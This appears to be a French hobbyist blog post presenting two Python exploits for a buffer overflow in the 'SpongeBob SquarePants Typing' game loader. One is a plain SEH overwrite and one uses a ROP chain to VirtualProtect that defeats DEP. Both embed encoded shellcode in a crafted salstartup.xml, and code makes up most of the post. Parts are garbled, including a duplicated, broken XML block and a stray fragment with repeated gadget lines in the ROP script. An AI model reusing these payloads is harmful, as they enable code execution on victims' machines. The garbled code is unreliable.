08/05/2011
Playing with SpongeBob
Introduction
Ce billet est là juste pour le fun et pour faire un petit signe de vie.
Il est dimanche, un lendemain de soirée, je me demande bien ce que je vais faire, un ami "thrashboul" m'avait montré un lien sur pastebin d'un exploit pour SpongeBob ( oui ! le jeux bob l'éponge), ne remettant pas la main dessus. Je me décide de le réecrire.
Problème
Le probléme se situe dans le loader du jeu "SpongeBob SquarePants Typing", il parse un fichier xml et récupère un path se situant dans la balise <userPath> mais ne vérifie pas la longueur de la chaine. Vous vous en doutez, ça aboutit sur un buffer overflow mais plus précisément sur un seh overwrite.
Je vais juste poster ici mes 2 exploits, un dans le cas ou sur la machine DEP n'est pas activé et l'autre dans le cas ou cette protection est belle est bien active. Ici ce sont des windows XP SP3.
SEH overwrite without defeating dep
#!/usr/bin/env python
from struct import pack,unpack
###########################################################################################
# #
# First excpetion occurs -------------|| #
# || #
# |-----------||---------------| #
# | || | #
# | \/ \/ #
# [Junk Buffer] [Next SEH] [SE Handler] [Shellcode] #
# jmp over pop pop ret #
# SE handler | #
# /\ | #
# || | #
# ||------------| #
# #
###########################################################################################
f = open('salstartup.xml', 'w')
content_begin = """<?xml version="1.0" standalone="yes"?>
<startup>
<userPath>\""""
shellcode = "\xd9\xf6\xba\x24\xb5\x20\x67\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1\x38\x31\x57\x17\x03\x57\x17\x83\xcb\x49\xc2\x92\xef\x5a\x8a\x5d\x0f\x9b\xed\xd4\xea\xaa\x3f\x82\x7f\x9e\x8f\xc0\x2d\x13\x7b\x84\xc5\xa0\x09\x01\xea\x01\xa7\x77\xc5\x92\x09\xb8\x89\x51\x0b\x44\xd3\x85\xeb\x75\x1c\xd8\xea\xb2\x40\x13\xbe\x6b\x0f\x86\x2f\x1f\x4d\x1b\x51\xcf\xda\x23\x29\x6a\x1c\xd7\x83\x75\x4c\x48\x9f\x3e\x74\xe2\xc7\x9e\x85\x27\x14\xe2\xcc\x4c\xef\x90\xcf\x84\x21\x58\xfe\xe8\xee\x67\xcf\xe4\xef\xa0\xf7\x16\x9a\xda\x04\xaa\x9d\x18\x77\x70\x2b\xbd\xdf\xf3\x8b\x65\xde\xd0\x4a\xed\xec\x9d\x19\xa9\xf0\x20\xcd\xc1\x0c\xa8\xf0\x05\x85\xea\xd6\x81\xce\xa9\x77\x93\xaa\x1c\x87\xc3\x12\xc0\x2d\x8f\xb0\x15\x57\xd2\xde\xe8\xd5\x68\xa7\xeb\xe5\x72\x87\x83\xd4\xf9\x48\xd3\xe8\x2b\x2d\x2b\xa3\x76\x07\xa4\x6a\xe3\x1a\xa9\x8c\xd9\x58\xd4\x0e\xe8\x20\x23\x0e\x99\x25\x6f\x88\x71\x57\xe0\x7d\x76\xc4\x01\x54\x15\xd0\xa1\x20\xb3\x4a\x3e\xa0\x34\xe1\xe2\x4d\xc2\x76\x6f\xd7\x59\x4b\xbd\x4b\xc1\xca\xad\x10\x2b\x69\x56\xb2\x33"
junk = 'Z' * 1024
spled = "\x90" * 1000
jump_6 = "\xeb\x06\x90\x90"
pop_pop_ret = pack("<I", 0x21134E57) # pop pop ret from mss32.dll (/SAFESEH:NO)
content_end = """\"</userPath>
<cdName>"SpongeBob SquarePants Typing"</cdName>
<cdAge>7-10</cdAge>
<music>1000</music>
<pdfInstaller>"C:\wtf\Nouveau dossier\INSTALL\ACROBAT\Ver50\Acrobat Reader 5 Installer.exe"</pdfInstaller>
<signin>
<execute>yes</execute>
<style>tlc</style>
<age>4To6</age>
<rscFile>default</rscFile>
</signin>
<disk1>
<filename>"C:\wtf\Nouveau dossier\TLC\383167-CD"</filename>
<cdName>"SpongeBob SquarePants Typing"</cdName>
</disk1>
<screenRSC>salstartup.rsc</screenRSC>
<screen>
<element>
<condition>all</condition>
<type>scene</type>
<id>9100</id>
</element>
<element>
<condition>all</condition>
<type>toon</type>
<x>0</x>
<y>0</y>
<id>9100</id>
<startFrame>1</startFrame>
</element>
<mainPlayButton>
<condition>all</condition>
<type>fob</type>
<class>play</class>
<cdCheck>disk1</cdCheck>
<target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\SPT.exe"</target>
<postLaunch>wait</postLaunch>
<x>461</x>
<y>60</y>
<id>9124</id>
</mainPlayButton>
<helpButton>
<condition>all</condition>
<type>fob</type>
<class>extension</class>
<cdCheck></cdCheck>
<target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\User's Guide.pdf"</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>543</x>
<y>158</y>
<id>9126</id>
</helpButton>
<uninstallButton>
<condition>all</condition>
<type>fob</type>
<class>uninstall</class>
<target>C:\WINDOWS\TLCUninstall.exe</target>
<parameters>-l</parameters>
<crc>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\Uninstall.xml"</crc>
<postLaunch>exit</postLaunch>
<x>514</x>
<y>373</y>
<id>9125</id>
</uninstallButton>
<onlineButton>
<condition>all</condition>
<type>fob</type>
<class>link</class>
<cdCheck></cdCheck>
<target>http://redirect.expressit.com/redirect.asp?resku=383167&action_id=Launcher</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>538</x>
<y>263</y>
<yy>375</yy>
<id>9130</id>
</onlineButton>
<EregButton>
<condition>all</condition>
<type>fob</type>
<class>install</class>
<cdCheck></cdCheck>
<target>"C:\Program Files\The Learning Company\SpongeBob SquarePants Typing\ereg\ereg32.exe"</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>522</x>
<y>324</y>
<id>9129</id>
</EregButton>
<SellScreen>
<condition>all</condition>
<type>fob</type>
<class>link</class>
<cdCheck>disk1</cdCheck>
<target>startup:startup/BrandingPage</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>543</x>
<y>207</y>
<id>9128</id>
</SellScreen>
</screen>
<BrandingPage>
<element>
<condition>all</condition>
<type>toon</type>
<id>5000</id>
</element>
<screenSaverButton>
<condition>all</condition>
<type>fob</type>
<class>install</class>
<cdCheck>disk1</cdCheck>
<target>"C:\wtf\Nouveau dossier\SailorificStuff\sbscreen_setup.exe"</target>
<parameters></parameters>
<postLaunch>wait</postLaunch>
<x>546</x>
<y>188</y>
<id>5054</id>
</screenSaverButton>
<backButton>
<condition>all</condition>
<type>fob</type>
<class>link</class>
<target>startup:startup/screen</target>
<x>537</x>
<y>263</y>
<id>5055</id>
</backButton>
</BrandingPage>
<sysReq>
<execute>yes</execute>
<pc>
<processor>
<family>pentium</family>
<speed>266</speed>
<msgType>warn</msgType>
<msgText>"266 MHz Pentium or faster is recommended."</msgText>
</processor>
<os>
<Win95>no</Win95>
<Win98>yes</Win98>
<WinMe>yes</WinMe>
<WinNT4>no</WinNT4>
<Win2000>yes</Win2000>
<WinXP>yes</WinXP>
<msgType>warn</msgType>
<msgText>"You operating system is not supported. Play at your own risk!"</msgText>
</os>
<diskSpace>
<mbAvailable>100</mbAvailable>
<msgType>ignore</msgType>
<msgText>"There is not enough hard disk space available to play!"</msgText>
</diskSpace>
<physicalRAM>
<mbAvailable>64</mbAvailable>
<msgType>warn</msgType>
<msgText>"There is not enough RAM available to play!"</msgText>
</physicalRAM>
<availableRAM>
<mbAvailable>64</mbAvailable>
<msgType>warn</msgType>
<msgText>You are low on memory!</msgText>
</availableRAM>
<display>
<width>800</width>
<height>600</height>
<bits>16</bits>
<msgType>fail</msgType>
<msgText>"Your display is not capable of 800 x 600 16-bit, thousands of colors."</msgText>
</display>
<sound>
<msgType>fail</msgType>
<msgText>"WAVE driver is not available."</msgText>
</sound>
</pc>
<mac>
<processor>
<family>ppc</family>
<speed>233</speed>
<msgType>warn</msgType>
<msgText>"233 MHz Powerpc or faster is recommended."</msgText>
</processor>
<os>
<minVersion>0860</minVersion>
<msgType>fail</msgType>
<msgType>fail</msgType>
<msgText>"Your display is not capable of 800 x 600 16-bit, thousands of colors."</msgText>
</display>
<sound>
<msgType>fail</msgType>
<msgText>"WAVE driver is not available."</msgText>
</sound>
</pc>
<mac>
<processor>
<family>ppc</family>
<speed>233</speed>
<msgType>warn</msgType>
<msgText>"233 MHz Powerpc or faster is recommended."</msgText>
</processor>
<os>
<minVersion>0860</minVersion>
<msgType>fail</msgType>
<msgText>"You must run System 8.6 or above!"</msgText>
</os>
<osX>
<minVersion>1004</minVersion>
<msgType>fail</msgType>
<msgText>"You must run OSX 10.04 or above!"</msgText>
</osX>
<diskSpace>
<mbAvailable>100</mbAvailable>
<msgType>ignore</msgType>
<msgText>"There is not enough hard disk space available to play!"</msgText>
</diskSpace>
<physicalRAM>
<mbAvailable>64</mbAvailable>
<msgType>warn</msgType>
<msgText>"There is not enough RAM available to play!"</msgText>
</physicalRAM>
<availableRAM>
<mbAvailable>0</mbAvailable>
<msgType>warn</msgType>
<msgText></msgText>
</availableRAM>
<colorDepth>
<minBits>16</minBits>
<msgType>warn</msgType>
<msgText>"Your display is not capable of 16-bit, thousands of colors."</msgText>
</colorDepth>
<sound>
<available>ignore</available>
<msgType>ignore</msgType>
<msgText></msgText>
</sound>
</mac>
</sysReq>
</startup>"""
f.write(content_begin + junk + jump_6 + pop_pop_ret + shellcode + spled + content_end)
SEH overwrite using rop
Ici j'ai dégagé tout le xml et je n'ai laissé que la partie fun c'est à dire toute la partie qui me permet de pivoter ma stack, la chaine de rop pour générer mes paramètres pour un call a VirtalProtect() afin de rendre la zone mémoire ou réside mon shellcode en PAGEEXECUTEREADWRITE.
#!/usr/bin/env python
from struct import pack,unpack
shellcode = "\xd9\xf6\xba\x24\xb5\x20\x67\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1\x38\x31\x57\x17\x03\x57\x17\x83\xcb\x49\xc2\x92\xef\x5a\x8a\x5d\x0f\x9b\xed\xd4\xea\xaa\x3f\x82\x7f\x9e\x8f\xc0\x2d\x13\x7b\x84\xc5\xa0\x09\x01\xea\x01\xa7\x77\xc5\x92\x09\xb8\x89\x51\x0b\x44\xd3\x85\xeb\x75\x1c\xd8\xea\xb2\x40\x13\xbe\x6b\x0f\x86\x2f\x1f\x4d\x1b\x51\xcf\xda\x23\x29\x6a\x1c\xd7\x83\x75\x4c\x48\x9f\x3e\x74\xe2\xc7\x9e\x85\x27\x14\xe2\xcc\x4c\xef\x90\xcf\x84\x21\x58\xfe\xe8\xee\x67\xcf\xe4\xef\xa0\xf7\x16\x9a\xda\x04\xaa\x9d\x18\x77\x70\x2b\xbd\xdf\xf3\x8b\x65\xde\xd0\x4a\xed\xec\x9d\x19\xa9\xf0\x20\xcd\xc1\x0c\xa8\xf0\x05\x85\xea\xd6\x81\xce\xa9\x77\x93\xaa\x1c\x87\xc3\x12\xc0\x2d\x8f\xb0\x15\x57\xd2\xde\xe8\xd5\x68\xa7\xeb\xe5\x72\x87\x83\xd4\xf9\x48\xd3\xe8\x2b\x2d\x2b\xa3\x76\x07\xa4\x6a\xe3\x1a\xa9\x8c\xd9\x58\xd4\x0e\xe8\x20\x23\x0e\x99\x25\x6f\x88\x71\x57\xe0\x7d\x76\xc4\x01\x54\x15\xd0\xa1\x20\xb3\x4a\x3e\xa0\x34\xe1\xe2\x4d\xc2\x76\x6f\xd7\x59\x4b\xbd\x4b\xc1\xca\xad\x10\x2b\x69\x56\xb2\x33"
junk = 'Z' * (1000 - len(shellcode) - 0x17)
junk += shellcode
junk += "Z" * 0x17
junk += pack("<I", 0x7C97A1A8) # 0x7C97A1A8 : {POP} # PUSH ESP # ADD BH,BH # DEC ECX # POP EAX # POP EBP # RETN 4 [Module : ntdll.dll] **
junk += "Z" * 4
junk += pack("<I", 0x77EA9C3E) # 0x77EA9C3E : {POP} # ADD EAX,0E # POP ESI # POP EBP # RETN 8 [Module : RPCRT4.dll] **
junk += 'Z' * 12
junk += pack("<I", 0x77BED8A9) # 0x77BED8A9 : # SUB EAX,20 # POP EBP # RETN [Module : msvcrt.dll] **
junk += pack("<I", 0x2112BF80) # SEH HANDLER # 0x2112BF80 : 800 : # ADD ESP,800 # RETN - mss32.dll - **
junk += "Z" * 8
for i in range(1, 9):
junk += pack("<I", 0x77BED8A9) # 0x77BED8A9 : # SUB EAX,20 # POP EBP # RETN [Module : msvcrt.dll] **
junk += "Z" * 4
junk += pack("<I", 0x7C81E6D9) # 0x7C81E6D9 : # MOV EDI,EAX # RETN [Module : kernel32.dll] **
junk += pack("<I", 0x77BED8A9) # 0x77BED8A9 : # SUB EAX,20 # POP EBP # RETN [Module : msvcrt.dll] **
junk += "Z" * 4
junk += pack("<I", 0x77BED8A9) # 0x77BED8A9 : # SUB EAX,20 # POP EBP # RETN [Module : msvcrt.dll] **
junk += "Z" * 4
junk += pack("<I", 0x7C97A1A8) # 0x7C97A1A8 : {POP} # PUSH ESP # ADD BH,BH # DEC ECX # POP EAX # POP EBP # RETN 4 [Module : ntdll.dll] **
junk += "Z" * 4
junk += pack("<I", 0x7759156D) # 0x7759156D : # INC ESI # PUSH EAX # POP ESI # RETN [Module : ole32.dll] **
junk += "Z" * 4
junk += pack("<I", 0x77BEE842) # 0x77BEE842 : {POP} # PUSH EDI # POP EAX # POP EBP # RETN [Module : msvcrt.dll] **
junk += "Z" * 4
junk += pack("<I", 0x58BB8E2A) # 0x58BB8E2A : # MOV DWORD PTR DS:[ESI+84],EAX # MOV EAX,ESI # POP ESI # RETN [Module : COMCTL32.dll] **
junk += "Z" * 4
junk += pack("<I", 0x774F5103) # 0x774F5103 : # ADD EAX,4 # RETN [Module : ole32.dll] **
junk += pack("<I", 0x7759156D) # 0x7759156D : # INC ESI # PUSH EAX # POP ESI # RETN [Module : ole32.dll] **
junk += pack("<I", 0x77BEE842) # 0x77BEE842 : {POP} # PUSH EDI # POP EAX # POP EBP # RETN [Module : msvcrt.dll] **
junk += "Z" * 4
junk += pack("<I", 0x58BB8E2A) # 0x58BB8E2A : # MOV DWORD PTR DS:[ESI+84],EAX # MOV EAX,ESI # POP ESI # RETN [Module : COMCTL32.dll] **
junk += "Z" * 4
junk += pack("<I", 0x774F5103) # 0x774F5103 : # ADD EAX,4 # RETN [Module : ole32.dll] **
junk += pack("<I", 0x7759156D) # 0x7759156D : # INC ESI # PUSH EAX # POP ESI # RETN [Module : ole32.dll] **
#junk += pack("<I", 0x7752E074) # 0x7752E074 : # XOR EAX,EAX # ADD EAX,328 # RETN [Module : ole32.dll] **
junk += pack("<I", 0x77C241E1) # 0x77C241E1 : # XOR EAX,EAX # RETN [Module : msvcrt.dll] **
junk += pack("<I", 0x775A1457) # 0x775A1457 : # ADD EAX,23C # RETN [Module : ole32.dll] **
junk += pack("<I", 0x58BB8E2A) # 0x58BB8E2A : # MOV DWORD PTR DS:[ESI+84],EAX # MOV EAX,ESI # POP ESI # RETN [Module : COMCTL32.dll] **
junk += "Z" * 4
junk += pack("<I", 0x774F5103) # 0x774F5103 : # ADD EAX,4 # RETN [Module : ole32.dll] **
junk += pack("<I", 0x7759156D) # 0x7759156D : # INC ESI # PUSH EAX # POP ESI # RETN [Module : ole32.dll] **
>) # 0x774F5103 : # ADD EAX,4 # RETN [Module : ole32.dll] **
junk += pack("<I", 0x7759156D) # 0x7759156D : # INC ESI # PUSH EAX # POP ESI # RETN [Module : ole32.dll] **
#junk += pack("<I", 0x7752E074) # 0x7752E074 : # XOR EAX,EAX # ADD EAX,328 # RETN [Module : ole32.dll] **
junk += pack("<I", 0x77C241E1) # 0x77C241E1 : # XOR EAX,EAX # RETN [Module : msvcrt.dll] **
junk += pack("<I", 0x775A1457) # 0x775A1457 : # ADD EAX,23C # RETN [Module : ole32.dll] **
junk += pack("<I", 0x58BB8E2A) # 0x58BB8E2A : # MOV DWORD PTR DS:[ESI+84],EAX # MOV EAX,ESI # POP ESI # RETN [Module : COMCTL32.dll] **
junk += "Z" * 4
junk += pack("<I", 0x774F5103) # 0x774F5103 : # ADD EAX,4 # RETN [Module : ole32.dll] **
junk += pack("<I", 0x7759156D) # 0x7759156D : # INC ESI # PUSH EAX # POP ESI # RETN [Module : ole32.dll] **
junk += pack("<I", 0x77C241E1) # 0x77C241E1 : # XOR EAX,EAX # RETN [Module : msvcrt.dll] **
junk += pack("<I", 0x77C1EC1D) # 0x77C1EC1D : # ADD EAX,40 # POP EBP # RETN [Module : msvcrt.dll] **
junk += "Z" * 4
junk += pack("<I", 0x58BB8E2A) # 0x58BB8E2A : # MOV DWORD PTR DS:[ESI+84],EAX # MOV EAX,ESI # POP ESI # RETN [Module : COMCTL32.dll] **
for i in range(1, 8):
junk += pack("<I", 0x77C241E1) # 0x77C241E1 : # XOR EAX,EAX # RETN [Module : msvcrt.dll] **
params = pack("<I", 0x7C801AD4) # 0x7C801AD4 : VirtualProtect()
params = params + "OSEF"
params = params + "OSEF"
params = params + "OSEF"
params = params + "OSEF"
params = params + pack("<I",0x2114d010)
nops = '\x90' * 900
payload = junk + params + nops
f.write(content_begin + payload + content_end)
Éclatez vous bien :].